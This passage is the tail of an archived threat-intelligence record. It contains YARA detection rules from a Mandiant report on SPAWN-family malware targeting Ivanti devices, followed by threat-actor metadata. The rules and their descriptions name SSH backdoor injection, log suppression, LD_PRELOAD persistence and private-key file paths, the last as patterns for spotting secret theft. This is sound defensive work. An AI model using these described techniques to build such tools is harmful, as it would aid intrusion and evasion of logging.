encrypted\r\nlocal file and decrypts it using an AES key derived from a SHA hash\r\nof the final 16 bytes of the encrypted payload.\"\r\n strings:\r\n $p00_0 = {e9[4]488b41??668338??75??4883c0??488941??b8[4]eb??b8}\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 17 of 20\n\n$p00_1 = {8030??488d40??41ffc14183f9??72??ba[4]488d4c24??e8[4]488d0d}\r\n condition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and\r\n (\r\n ($p00_0 in (17000..28000) and $p00_1 in (3700..14000))\r\n )\r\n}\r\nrule M_APT_Installer_SPAWNSNAIL_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Detects SPAWNSNAIL. SPAWNSNAIL is an SSH\r\nbackdoor targeting Ivanti devices. It has an ability to inject a specified\r\nbinary to other process, running local SSH backdoor when injected to\r\ndsmdm process, as well as injecting additional malware to dslogserver\"\r\n md5 = \"e7d24813535f74187db31d4114f607a1\"\r\n \r\n strings:\r\n $priv = \"PRIVATE KEY-----\" ascii fullword\r\n \r\n $key1 = \"%d/id_ed25519\" ascii fullword\r\n $key2 = \"%d/id_ecdsa\" ascii fullword\r\n $key3 = \"%d/id_rsa\" ascii fullword\r\n \r\n $sl1 = \"[selinux] enforce\" ascii fullword\r\n $sl2 = \"DSVersion::getReleaseStr()\" ascii fullword\r\n \r\n $ssh1 = \"ssh_set_server_callbacks\" ascii fullword\r\n $ssh2 = \"ssh_handle_key_exchange\" ascii fullword\r\n $ssh3 = \"ssh_add_set_channel_callbacks\" ascii fullword\r\n $ssh4 = \"ssh_channel_close\" ascii fullword\r\n \r\n condition:\r\n uint32(0) == 0x464c457f and $priv and any of ($key*)\r\nand any of ($sl*) and any of ($ssh*)\r\n}\r\nrule M_APT_Installer_SPAWNANT_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Detects SPAWNANT. SPAWNANT is an\r\nInstaller targeting Ivanti devices. Its purpose is to persistently\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 18 of 20\n\ninstall other malware from the SPAWN family (SPAWNSNAIL,\r\nSPAWNMOLE) as well as drop additional webshells on the box.\"\r\n \r\n strings:\r\n $s1 = \"dspkginstall\" ascii fullword\r\n $s2 = \"vsnprintf\" ascii fullword\r\n $s3 = \"bom_files\" ascii fullword\r\n $s4 = \"do-install\" ascii\r\n $s5 = \"ld.so.preload\" ascii\r\n $s6 = \"LD_PRELOAD\" ascii\r\n $s7 = \"scanner.py\" ascii\r\n \r\n condition:\r\n uint32(0) == 0x464c457f and 5 of ($s*)\r\n}\r\nrule M_APT_Tunneler_SPAWNMOLE_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Detects a specific comparisons in SPAWNMOLE\r\ntunneler, which allow malware to filter put its own traffic .\r\nSPAWNMOLE is a tunneler written in C and compiled as an ELF32\r\nexecutable. The sample is capable of hijacking a process on the\r\ncompromised system with a specific name and hooking into its\r\ncommunication capabilities in order to create a proxy server for\r\ntunneling traffic.\"\r\n md5 = \"4f79c70cce4207d0ad57a339a9c7f43c\"\r\n \r\n strings:\r\n /*\r\n 3C 16 cmp al, 16h\r\n 74 14 jz short loc_5655C038\r\n 0F B6 45 C1 movzx eax, [ebp+var_3F]\r\n 3C 03 cmp al, 3\r\n 74 0C jz short loc_5655C038\r\n 0F B6 45 C5 movzx eax, [ebp+var_3B]\r\n 3C 01 cmp al, 1\r\n 0F 85 ED 00 00 00 jnz loc_5655C125\r\n */\r\n $comparison1 = { 3C 16 74 [1] 0F B6 [2] 3C 03 74 [1] 0F B6 [2]\r\n3C 01 0F 85 }\r\n /*\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 19 of 20\n\n81 7D E8 E2 E3 49 FB cmp [ebp+var_18], 0FB49E3E2h\r\n 0F 85 CD 00 00 00 jnz loc_5655C128\r\n 81 7D E4 61 83 C3 1B cmp [ebp+var_1C], 1BC38361h\r\n 0F 85 C0 00 00 00 jnz loc_5655C128\r\n */\r\n $comparison2 = { 81 [2] E2 E3 49 FB 0F 85 [4] 81 [2] 61 83 C3\r\n1B 0F 85}\r\n \r\n \r\n condition:\r\n uint32(0) == 0x464c457f and all of them\r\n}\r\nrule M_APT_Utility_SPAWNSLOTH_1\r\n{\r\n meta:\r\n author = \"Mandiant\"\r\n description = \"Detects SPAWNSLOTH. SPAWNSLOTH\r\nis an Utility targeting Ivanti devices. Its purpose is to work\r\ntogether with SPAWNSNAIL and block logging via dslogserver\r\nprocess when SPAWNSNAIL backdoor is active.\"\r\n md5 = \"4acfc5df7f24c2354384f7449280d9e0\"\r\n \r\n strings:\r\n $dslog = \"dslogserver\" ascii fullword\r\n $hook1 = \"g_do_syslog_servers_exist\" ascii fullword\r\n $hook2 = \"_ZN5DSLog4File3addEPKci\" ascii fullword\r\n $hook3 = \"funchook_create\" ascii fullword\r\n \r\n condition:\r\n uint32(0) == 0x464c457f and all of them\r\n}\r\nPosted in\r\nThreat Intelligence\r\nSource: https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nhttps://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en\r\nPage 20 of 20", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://cloud.google.com/blog/topics/threat-intelligence/ivanti-post-exploitation-lateral-movement?hl=en" ], "report_names": [ "ivanti-post-exploitation-lateral-movement?hl=en" ], "threat_actors": [ { "id": "846522d7-29cb-4a0c-8ebe-ffba7429e2d7", "created_at": "2023-06-23T02:04:34.793629Z", "updated_at": "2026-04-10T02:00:04.971054Z", "deleted_at": null, "main_name": "Volt Typhoon", "aliases": [ "Bronze Silhouette", "Dev-0391", "Insidious Taurus", "Redfly", "Storm-0391", "UAT-5918", "UAT-7237", "UNC3236", "VOLTZITE", "Vanguard Panda" ], "source_name": "ETDA:Volt Typhoon", "tools": [ "FRP", "Fast Reverse Proxy", "Impacket", "LOLBAS", "LOLBins", "Living off the Land" ], "source_id": "ETDA", "reports": null }, { "id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2", "created_at": "2022-10-25T16:07:24.471018Z", "updated_at": "2026-04-10T02:00:05.002374Z", "deleted_at": null, "main_name": "Cron", "aliases": [], "source_name": "ETDA:Cron", "tools": [ "Catelites", "Catelites Bot", "CronBot", "TinyZBot" ], "source_id": "ETDA", "reports": null }, { "id": "b2e48aa5-0dea-4145-a7e5-9a0f39d786d8", "created_at": "2024-01-18T02:02:34.643994Z", "updated_at": "2026-04-10T02:00:04.959645Z", "deleted_at": null, "main_name": "UNC5221", "aliases": [ "UNC5221", "UTA0178" ], "source_name": "ETDA:UNC5221", "tools": [ "BRICKSTORM", "GIFTEDVISITOR", "GLASSTOKEN", "LIGHTWIRE", "PySoxy", "THINSPOOL", "WARPWIRE", "WIREFIRE", "ZIPLINE" ], "source_id": "ETDA", "reports": null }, { "id": "6ce34ba9-7321-4caa-87be-36fa99dfe9c9", "created_at": "2024-01-12T02:00:04.33082Z", "updated_at": "2026-04-10T02:00:03.517264Z", "deleted_at": null, "main_name": "UTA0178", "aliases": [ "UNC5221", "Red Dev 61" ], "source_name": "MISPGALAXY:UTA0178", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "fe95d824-b40b-42a0-8efd-fa3af8456d14", "created_at": "2024-03-21T02:00:04.692668Z", "updated_at": "2026-04-10T02:00:03.601506Z", "deleted_at": null, "main_name": "UNC5325", "aliases": [], "source_name": "MISPGALAXY:UNC5325", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "2f2a7c6c-f414-48f7-8095-e2da5856680e", "created_at": "2024-04-20T02:00:03.570471Z", "updated_at": "2026-04-10T02:00:03.62238Z", "deleted_at": null, "main_name": "UNC5266", "aliases": [], "source_name": "MISPGALAXY:UNC5266", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "8306123b-72e8-47b5-8103-17e2d9095b95", "created_at": "2024-04-20T02:00:03.573036Z", "updated_at": "2026-04-10T02:00:03.623348Z", "deleted_at": null, "main_name": "UNC5330", "aliases": [], "source_name": "MISPGALAXY:UNC5330", "tools": [ "GOST", "GO Simple Tunnel" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "15a95181-1984-4385-ba2a-272f929fdc85", "created_at": "2024-04-20T02:00:03.57553Z", "updated_at": "2026-04-10T02:00:03.624427Z", "deleted_at": null, "main_name": "UNC5337", "aliases": [], "source_name": "MISPGALAXY:UNC5337", "tools": [ "SPAWNMOLE", "SPAWNANT", "SPAWNSLOTH" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "42ee1c89-d75c-4e1e-91fa-dab8c0e83bf6", "created_at": "2024-04-20T02:00:03.5779Z", "updated_at": "2026-04-10T02:00:03.626285Z", "deleted_at": null, "main_name": "UNC5291", "aliases": [], "source_name": "MISPGALAXY:UNC5291", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "d24c2548-d163-4a73-865f-0d4cb917fee7", "created_at": "2024-04-20T02:00:03.580316Z", "updated_at": "2026-04-10T02:00:03.628323Z", "deleted_at": null, "main_name": "UNC3569", "aliases": [], "source_name": "MISPGALAXY:UNC3569", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "a88747e2-ffed-45d8-b847-8464361b2254", "created_at": "2023-11-01T02:01:06.605663Z", "updated_at": "2026-04-10T02:00:05.289908Z", "deleted_at": null, "main_name": "Volt Typhoon", "aliases": [ "Volt Typhoon", "BRONZE SILHOUETTE", "Vanguard Panda", "DEV-0391", "UNC3236", "Voltzite", "Insidious Taurus" ], "source_name": "MITRE:Volt Typhoon", "tools": [ "netsh", "PsExec", "ipconfig", "Wevtutil", "VersaMem", "Tasklist", "Mimikatz", "Impacket", "Systeminfo", "netstat", "Nltest", "certutil", "FRP", "cmd" ], "source_id": "MITRE", "reports": null }, { "id": "f87ef0bf-0574-492f-aebc-63e5953938e2", "created_at": "2024-11-23T02:00:04.116692Z", "updated_at": "2026-04-10T02:00:03.779803Z", "deleted_at": null, "main_name": "Gorilla", "aliases": [], "source_name": "MISPGALAXY:Gorilla", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "49b3063e-a96c-4a43-b28b-1c380ae6a64b", "created_at": "2025-08-07T02:03:24.661509Z", "updated_at": "2026-04-10T02:00:03.644548Z", "deleted_at": null, "main_name": "BRONZE SILHOUETTE", "aliases": [ "Dev-0391 ", "Insidious Taurus ", "UNC3236 ", "Vanguard Panda ", "Volt Typhoon ", "Voltzite " ], "source_name": "Secureworks:BRONZE SILHOUETTE", "tools": [ "Living-off-the-land binaries", "Web shells" ], "source_id": "Secureworks", "reports": null }, { "id": "4ed2b20c-7523-4852-833b-cebee8029f55", "created_at": "2023-05-26T02:02:03.524749Z", "updated_at": "2026-04-10T02:00:03.366175Z", "deleted_at": null, "main_name": "Volt Typhoon", "aliases": [ "BRONZE SILHOUETTE", "VANGUARD PANDA", "UNC3236", "Insidious Taurus", "VOLTZITE", "Dev-0391", "Storm-0391" ], "source_name": "MISPGALAXY:Volt Typhoon", "tools": [], "source_id": "MISPGALAXY", "reports": null } ], "ts_created_at": 1775434453, "ts_updated_at": 1775792084, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/b31bac9f3cd7bdeb0e4b79edacae72ca02ee357b.pdf", "text": "https://archive.orkl.eu/b31bac9f3cd7bdeb0e4b79edacae72ca02ee357b.txt", "img": "https://archive.orkl.eu/b31bac9f3cd7bdeb0e4b79edacae72ca02ee357b.jpg" } }